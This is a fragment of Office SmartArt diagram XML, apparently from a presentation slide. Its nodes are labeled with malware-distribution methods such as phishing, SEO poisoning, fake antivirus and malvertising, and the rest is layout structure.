    <dgm:cxn modelId="{8BBFF144-D6E5-4746-9EF5-149B0C8D2248}" srcId="{0F8D4BCF-B2FA-4ECE-A84E-B3C0AA14C8F3}" destId="{E83FA6B5-F495-4097-8A1F-B7006267A093}" srcOrd="1" destOrd="0" parTransId="{91D51CCA-6C33-4F62-BB8A-E3A52CC7831C}" sibTransId="{7F6FF5A9-3612-42E3-9944-7DCA554F9298}"/>
    <dgm:cxn modelId="{B5983847-916D-4B80-8946-4B0C39B89A47}" type="presOf" srcId="{0F8D4BCF-B2FA-4ECE-A84E-B3C0AA14C8F3}" destId="{D2290C77-F571-48E0-8EE2-D1B0D872A09D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{F2CEBB65-A404-435C-A484-4D1F6B693E01}" type="presOf" srcId="{E8EAB5B2-EE76-482C-80F8-43BBC1C8A420}" destId="{D8745CA8-4A6A-4AE4-B0BB-280153E2814D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{2D510A69-85FB-4AA7-856E-F1232B1C1029}" type="presOf" srcId="{9F84937D-7EC0-4AD3-89EC-AFA1242419EE}" destId="{C69B6773-B665-4004-B114-232BDB8F894F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{0FC05D85-0F25-43E2-808F-059805D08D8D}" type="presOf" srcId="{E83FA6B5-F495-4097-8A1F-B7006267A093}" destId="{7E0016F1-9ECF-4DCF-8D49-DEED54E24929}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{48C9DB8B-908D-4BA7-9762-03D63450FF30}" srcId="{0F8D4BCF-B2FA-4ECE-A84E-B3C0AA14C8F3}" destId="{92F4D289-7086-474B-A9F4-D725A5A25F3C}" srcOrd="4" destOrd="0" parTransId="{80844AAD-11A5-4096-9ACB-A5B7594F4BBF}" sibTransId="{30DD3FCD-0C4A-4473-9810-2F11BC1AE229}"/>
    <dgm:cxn modelId="{28BEAC9E-0411-4426-A429-FE9373C294C7}" type="presOf" srcId="{92F4D289-7086-474B-A9F4-D725A5A25F3C}" destId="{11AA665D-9500-4B02-9965-60093CCA0F2E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{078EADB0-B613-440D-89D0-DC1B2A670E20}" type="presOf" srcId="{E8EAB5B2-EE76-482C-80F8-43BBC1C8A420}" destId="{0861398D-B5BA-4E5B-8349-EA74F3C9FB86}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{824C16C2-DEA4-47B7-9751-22E59583704A}" srcId="{0F8D4BCF-B2FA-4ECE-A84E-B3C0AA14C8F3}" destId="{5BAA5807-BF11-473E-97F3-91494E94A21A}" srcOrd="0" destOrd="0" parTransId="{59A73E71-C173-4948-ACF4-2FC69F99962A}" sibTransId="{0C075413-031A-4611-8F1B-878B9A56FDC5}"/>
    <dgm:cxn modelId="{C4609CC7-4D1E-43D7-91A8-C8F72BA8DD85}" srcId="{0F8D4BCF-B2FA-4ECE-A84E-B3C0AA14C8F3}" destId="{9F84937D-7EC0-4AD3-89EC-AFA1242419EE}" srcOrd="2" destOrd="0" parTransId="{614399F9-A63C-4E7C-852F-8A2CE918DAA0}" sibTransId="{F3F07C3D-4008-448E-A442-D370EFE81FC1}"/>
    <dgm:cxn modelId="{1B2E3CFB-5D24-44FC-8D23-90C170D95168}" srcId="{0F8D4BCF-B2FA-4ECE-A84E-B3C0AA14C8F3}" destId="{E8EAB5B2-EE76-482C-80F8-43BBC1C8A420}" srcOrd="3" destOrd="0" parTransId="{B54B2862-D97F-4A29-A6EE-740BAE9BE596}" sibTransId="{ABAFA4D5-3F72-4684-9A3C-24187B0C57F1}"/>
    <dgm:cxn modelId="{271027FC-DF22-4E58-AA37-E29D96713549}" type="presOf" srcId="{92F4D289-7086-474B-A9F4-D725A5A25F3C}" destId="{9B91E61F-A442-4AC5-94F0-69915739571C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{A608F648-221C-4F37-9856-1133F037B2DF}" type="presParOf" srcId="{D2290C77-F571-48E0-8EE2-D1B0D872A09D}" destId="{8EB4009E-914B-4E98-ABAC-D26477CDC10A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{3A57512C-E108-457B-BCFC-EAE767FC51EE}" type="presParOf" srcId="{8EB4009E-914B-4E98-ABAC-D26477CDC10A}" destId="{800B5C39-C726-4DB7-8B93-30D294838425}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{DA8B187B-3DB9-4889-8C0B-063828C33B15}" type="presParOf" srcId="{8EB4009E-914B-4E98-ABAC-D26477CDC10A}" destId="{6CDD37F9-9142-40F6-8788-02E1863C3184}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{C51DDE5F-547D-4C9F-B3C0-F1FC81386ED2}" type="presParOf" srcId="{8EB4009E-914B-4E98-ABAC-D26477CDC10A}" destId="{0D404FAB-A734-4F23-AE22-9C58E47D9BF7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{AA9564F2-777F-4321-9B32-4C00C75E3A54}" type="presParOf" srcId="{D2290C77-F571-48E0-8EE2-D1B0D872A09D}" destId="{046F4A00-96ED-4BFB-AE6A-7F64A4199B4B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{553157E8-09BF-4F8F-ABAE-F00CCC86A229}" type="presParOf" srcId="{D2290C77-F571-48E0-8EE2-D1B0D872A09D}" destId="{0F4917D3-C2A7-4127-9299-087B18FFCD28}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{B71C28CB-372B-4668-B9DB-D2CAC30756B0}" type="presParOf" srcId="{0F4917D3-C2A7-4127-9299-087B18FFCD28}" destId="{7E0016F1-9ECF-4DCF-8D49-DEED54E24929}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{A8897D3E-4BF0-4AD2-9752-00A341544059}" type="presParOf" srcId="{0F4917D3-C2A7-4127-9299-087B18FFCD28}" destId="{4EF98E4F-51A1-4766-B0B9-366C439D3E24}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{A288E0F2-A559-4F68-A8EB-2D8F5B3D496D}" type="presParOf" srcId="{0F4917D3-C2A7-4127-9299-087B18FFCD28}" destId="{601B1C51-A108-45A8-838F-75C469B17A01}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{2847280D-1563-4A36-8C5D-3B9C157EB12C}" type="presParOf" srcId="{D2290C77-F571-48E0-8EE2-D1B0D872A09D}" destId="{4B559AA5-3E92-4C6E-B194-F3579A0974D7}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{24BC6E2A-B8AA-49AE-990A-A91370CD9048}" type="presParOf" srcId="{D2290C77-F571-48E0-8EE2-D1B0D872A09D}" destId="{2E4CE5B8-FD49-45EF-848A-38CE57A26F7C}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{469D2EA4-2C24-488D-B878-CAE31878E96E}" type="presParOf" srcId="{2E4CE5B8-FD49-45EF-848A-38CE57A26F7C}" destId="{C69B6773-B665-4004-B114-232BDB8F894F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{14035EDA-1B27-4D52-9E78-354A51E2C978}" type="presParOf" srcId="{2E4CE5B8-FD49-45EF-848A-38CE57A26F7C}" destId="{E47BA8CB-37A3-45B3-B06C-880C4A651ACF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{5380527E-D9AD-47BE-B388-B7FF7F75FB5C}" type="presParOf" srcId="{2E4CE5B8-FD49-45EF-848A-38CE57A26F7C}" destId="{8EF1B1B1-B114-4BE4-B2AC-6BC708228B80}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{88050EB9-75C2-476A-9FBD-52C7F6743450}" type="presParOf" srcId="{D2290C77-F571-48E0-8EE2-D1B0D872A09D}" destId="{EB259E54-8238-4480-A9A7-00537729A580}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{B0D3DFAA-CE6D-4174-B8E7-580BC13CD946}" type="presParOf" srcId="{D2290C77-F571-48E0-8EE2-D1B0D872A09D}" destId="{8BDB858C-EC00-49AD-9CCF-81EB09ACD4F3}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{6173A05C-6B86-49C1-AEE1-BED5F02185DF}" type="presParOf" srcId="{8BDB858C-EC00-49AD-9CCF-81EB09ACD4F3}" destId="{D8745CA8-4A6A-4AE4-B0BB-280153E2814D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{302C4D59-3F23-4E85-B649-C24C2DAA6583}" type="presParOf" srcId="{8BDB858C-EC00-49AD-9CCF-81EB09ACD4F3}" destId="{B0C8FEB7-A950-47BC-BA07-39E851073386}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{C891ADDB-A844-4CA8-9518-6AA35AD92EBB}" type="presParOf" srcId="{8BDB858C-EC00-49AD-9CCF-81EB09ACD4F3}" destId="{0861398D-B5BA-4E5B-8349-EA74F3C9FB86}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{2668A0B9-4282-4415-8B09-2417A2FF4360}" type="presParOf" srcId="{D2290C77-F571-48E0-8EE2-D1B0D872A09D}" destId="{24545905-E29D-46D9-91B3-96111CF05587}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{CFCA7EE4-A4DE-42C3-8BD7-90563B11BF11}" type="presParOf" srcId="{D2290C77-F571-48E0-8EE2-D1B0D872A09D}" destId="{D5E40FBC-99CA-46F0-99E5-CC5E6840F91F}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{62F425FB-3099-45F5-A942-FD00C29F0ABF}" type="presParOf" srcId="{D5E40FBC-99CA-46F0-99E5-CC5E6840F91F}" destId="{11AA665D-9500-4B02-9965-60093CCA0F2E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{E5E8E96A-50B2-486D-AFB1-EB9B5E650F93}" type="presParOf" srcId="{D5E40FBC-99CA-46F0-99E5-CC5E6840F91F}" destId="{B35B7DFF-CDFB-4296-84BC-B758F90E7C13}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{DFB1F40D-3FDB-4EF5-8D58-303EE43C328A}" type="presParOf" srcId="{D5E40FBC-99CA-46F0-99E5-CC5E6840F91F}" destId="{9B91E61F-A442-4AC5-94F0-69915739571C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5BB79A-127E-4C76-9AFA-16452DAE1F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2D2BA6-9B0A-4300-8084-C30493716FA0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Phishing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66231319-7E29-4D7F-BB28-A4F5FAF5F17F}" type="parTrans" cxnId="{8AE47316-C6D7-4859-AF38-0D41D95FD3B6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AD0C5FD-7241-4C4C-8E64-884C3EA6A70B}" type="sibTrans" cxnId="{8AE47316-C6D7-4859-AF38-0D41D95FD3B6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3FEB81F-43C8-4E10-BFAD-4A9CE194EB35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SEO Poisoning</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9D5F870-55A4-47FD-BB32-F968F5D31702}" type="parTrans" cxnId="{F1C3B80F-A146-47FE-8548-1B9144946EC2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4095CA64-F1B8-4436-B8FD-F8340DE25373}" type="sibTrans" cxnId="{F1C3B80F-A146-47FE-8548-1B9144946EC2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00B3ECC6-A432-4B95-80FA-142A9F75129D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Fake AV</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2AD02CE1-9648-407A-86E3-3039CBEFB010}" type="parTrans" cxnId="{E09B3F3B-B0E5-403B-9191-0056C1853E4E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3F8D07C-B536-41CE-B0E9-D65AAE1B074E}" type="sibTrans" cxnId="{E09B3F3B-B0E5-403B-9191-0056C1853E4E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23C83B90-305E-4F57-98FF-91E34F624531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Social Media Link Insertion</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{248533B3-4A9A-4B59-877E-458FE227B725}" type="parTrans" cxnId="{0519635D-0E70-425F-9F7F-525A4A2CD8B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8EEDAE1A-8A9B-498D-A862-DD4429AB9408}" type="sibTrans" cxnId="{0519635D-0E70-425F-9F7F-525A4A2CD8B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72F152A9-6743-417F-B517-52FF7E81D392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Forum Link Insertion</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A47B9B6-F7DF-4707-9D0C-A8F094360FDE}" type="parTrans" cxnId="{47165921-8B0B-488D-9074-D4D095AF2BCD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F179847E-21AE-4759-AD2D-CE0766079BC9}" type="sibTrans" cxnId="{47165921-8B0B-488D-9074-D4D095AF2BCD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DA7A1A9-9DFE-4187-A0F9-3753AFA42067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Malvertising</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{70F7A1C3-2C97-46AD-AD70-C3AB1FCD3031}" type="parTrans" cxnId="{3005826D-FD8D-4933-B142-14E12C4F7612}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83A44EF0-3A66-4613-A1C9-BC1BEDD7F743}" type="sibTrans" cxnId="{3005826D-FD8D-4933-B142-14E12C4F7612}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDEEA822-5B65-4E00-86A6-9696EF77207C}" type="pres">
      <dgm:prSet presAssocID="{4C5BB79A-127E-4C76-9AFA-16452DAE1F0C}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AC07C439-2BF6-47B4-921B-9B75CBBC3B79}" type="pres">
      <dgm:prSet presAssocID="{782D2BA6-9B0A-4300-8084-C30493716FA0}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9F353FE3-4FBF-4051-946F-528CF7E59F12}" type="pres">
      <dgm:prSet presAssocID="{0AD0C5FD-7241-4C4C-8E64-884C3EA6A70B}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7FC377EC-8A29-4658-B9B5-27097634DF6B}" type="pres">
      <dgm:prSet presAssocID="{B3FEB81F-43C8-4E10-BFAD-4A9CE194EB35}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3CE389BF-C49A-4106-8EFF-B2687019D6A8}" type="pres">
      <dgm:prSet presAssocID="{4095CA64-F1B8-4436-B8FD-F8340DE25373}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{19484F48-520F-4EA8-BD1B-4F61F8822526}" type="pres">
      <dgm:prSet presAssocID="{00B3ECC6-A432-4B95-80FA-142A9F75129D}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EF4F4DB9-80F8-496D-9BD2-3F6CBAB635E4}" type="pres">
      <dgm:prSet presAssocID="{F3F8D07C-B536-41CE-B0E9-D65AAE1B074E}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EADFF2E9-6D66-417F-94C4-F625B5FB8B15}" type="pres">
      <dgm:prSet presAssocID="{23C83B90-305E-4F57-98FF-91E34F624531}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{95A570C9-0280-4B73-87DC-6E5698545FF3}" type="pres">
      <dgm:prSet presAssocID="{8EEDAE1A-8A9B-498D-A862-DD4429AB9408}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1ED6A8B8-F392-4C63-8C47-878265522373}" type="pres">
      <dgm:prSet presAssocID="{72F152A9-6743-417F-B517-52FF7E81D392}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6" custLinFactNeighborX="-844" custLinFactNeighborY="4443">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4C826A31-6809-4265-AB8F-E6B7859E0644}" type="pres">
      <dgm:prSet presAssocID="{F179847E-21AE-4759-AD2D-CE0766079BC9}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{938E69DD-DA65-49A9-BD93-38ECB59A4FE1}" type="pres">
      <dgm:prSet presAssocID="{1DA7A1A9-9DFE-4187-A0F9-3753AFA42067}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{CD59850F-8A97-440C-AFB7-AE9CAFA75D98}" type="presOf" srcId="{72F152A9-6743-417F-B517-52FF7E81D392}" destId="{1ED6A8B8-F392-4C63-8C47-878265522373}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F1C3B80F-A146-47FE-8548-1B9144946EC2}" srcId="{4C5BB79A-127E-4C76-9AFA-16452DAE1F0C}" destId="{B3FEB81F-43C8-4E10-BFAD-4A9CE194EB35}" srcOrd="1" destOrd="0" parTransId="{B9D5F870-55A4-47FD-BB32-F968F5D31702}" sibTransId="{4095CA64-F1B8-4436-B8FD-F8340DE25373}"/>
    <dgm:cxn modelId="{D6C45C13-1A34-4F60-890C-3C755ABD10CE}" type="presOf" srcId="{782D2BA6-9B0A-4300-8084-C30493716FA0}" destId="{AC07C439-2BF6-47B4-921B-9B75CBBC3B79}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8AE47316-C6D7-4859-AF38-0D41D95FD3B6}" srcId="{4C5BB79A-127E-4C76-9AFA-16452DAE1F0C}" destId="{782D2BA6-9B0A-4300-8084-C30493716FA0}" srcOrd="0" destOrd="0" parTransId="{66231319-7E29-4D7F-BB28-A4F5FAF5F17F}" sibTransId="{0AD0C5FD-7241-4C4C-8E64-884C3EA6A70B}"/>
    <dgm:cxn modelId="{90A0EB1B-FEF5-4CF3-8811-0E5CD11135B9}" type="presOf" srcId="{4C5BB79A-127E-4C76-9AFA-16452DAE1F0C}" destId="{BDEEA822-5B65-4E00-86A6-9696EF77207C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{47165921-8B0B-488D-9074-D4D095AF2BCD}" srcId="{4C5BB79A-127E-4C76-9AFA-16452DAE1F0C}" destId="{72F152A9-6743-417F-B517-52FF7E81D392}" srcOrd="4" destOrd="0" parTransId="{2A47B9B6-F7DF-4707-9D0C-A8F094360FDE}" sibTransId="{F179847E-21AE-4759-AD2D-CE0766079BC9}"/>
    <dgm:cxn modelId="{CBFC5323-0E65-436D-B9B6-DEB7F7DB6F1A}" type="presOf" srcId="{00B3ECC6-A432-4B95-80FA-142A9F75129D}" destId="{19484F48-520F-4EA8-BD1B-4F61F8822526}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{D58D262F-1C68-4C45-B27D-E1D67F317DBC}" type="presOf" srcId="{B3FEB81F-43C8-4E10-BFAD-4A9CE194EB35}" destId="{7FC377EC-8A29-4658-B9B5-27097634DF6B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E09B3F3B-B0E5-403B-9191-0056C1853E4E}" srcId="{4C5BB79A-127E-4C76-9AFA-16452DAE1F0C}" destId="{00B3ECC6-A432-4B95-80FA-142A9F75129D}" srcOrd="2" destOrd="0" parTransId="{2AD02CE1-9648-407A-86E3-3039CBEFB010}" sibTransId="{F3F8D07C-B536-41CE-B0E9-D65AAE1B074E}"/>
    <dgm:cxn modelId="{0519635D-0E70-425F-9F7F-525A4A2CD8B0}" srcId="{4C5BB79A-127E-4C76-9AFA-16452DAE1F0C}" destId="{23C83B90-305E-4F57-98FF-91E34F624531}" srcOrd="3" destOrd="0" parTransId="{248533B3-4A9A-4B59-877E-458FE227B725}" sibTransId="{8EEDAE1A-8A9B-498D-A862-DD4429AB9408}"/>
    <dgm:cxn modelId="{3005826D-FD8D-4933-B142-14E12C4F7612}" srcId="{4C5BB79A-127E-4C76-9AFA-16452DAE1F0C}" destId="{1DA7A1A9-9DFE-4187-A0F9-3753AFA42067}" srcOrd="5" destOrd="0" parTransId="{70F7A1C3-2C97-46AD-AD70-C3AB1FCD3031}" sibTransId="{83A44EF0-3A66-4613-A1C9-BC1BEDD7F743}"/>
    <dgm:cxn modelId="{E3BC9DCC-16B0-441E-96D9-DC853831C77D}" type="presOf" srcId="{1DA7A1A9-9DFE-4187-A0F9-3753AFA42067}" destId="{938E69DD-DA65-49A9-BD93-38ECB59A4FE1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F4635BE4-E734-4B46-8BE0-56FD8A180D1F}" type="presOf" srcId="{23C83B90-305E-4F57-98FF-91E34F624531}" destId="{EADFF2E9-6D66-417F-94C4-F625B5FB8B15}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{37762B20-4801-43C8-9914-4644C17D2FCE}" type="presParOf" srcId="{BDEEA822-5B65-4E00-86A6-9696EF77207C}" destId="{AC07C439-2BF6-47B4-921B-9B75CBBC3B79}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8715A071-AE4A-43CA-B9F9-8C86B3C8DA41}" type="presParOf" srcId="{BDEEA822-5B65-4E00-86A6-9696EF77207C}" destId="{9F353FE3-4FBF-4051-946F-528CF7E59F12}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{9076393A-0CC8-4A6E-8223-C6B04B40481A}" type="presParOf" srcId="{BDEEA822-5B65-4E00-86A6-9696EF77207C}" destId="{7FC377EC-8A29-4658-B9B5-27097634DF6B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{3BB3E1A2-B6BD-4FB9-92E3-6EC3CD2BF45E}" type="presParOf" srcId="{BDEEA822-5B65-4E00-86A6-9696EF77207C}" destId="{3CE389BF-C49A-4106-8EFF-B2687019D6A8}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{71658DEA-C4A2-4D0B-9C4E-C3313086F761}" type="presParOf" srcId="{BDEEA822-5B65-4E00-86A6-9696EF77207C}" destId="{19484F48-520F-4EA8-BD1B-4F61F8822526}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{926FE55C-F1C4-424E-B473-2B62E685303B}" type="presParOf" srcId="{BDEEA822-5B65-4E00-86A6-9696EF77207C}" destId="{EF4F4DB9-80F8-496D-9BD2-3F6CBAB635E4}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C4EA2BB9-463F-4076-A67F-CAC48A8088C1}" type="presParOf" srcId="{BDEEA822-5B65-4E00-86A6-9696EF77207C}" destId="{EADFF2E9-6D66-417F-94C4-F625B5FB8B15}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{60A38E3A-72B9-42A5-8D19-2AC2C2ACFCA8}" type="presParOf" srcId="{BDEEA822-5B65-4E00-86A6-9696EF77207C}" destId="{95A570C9-0280-4B73-87DC-6E5698545FF3}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
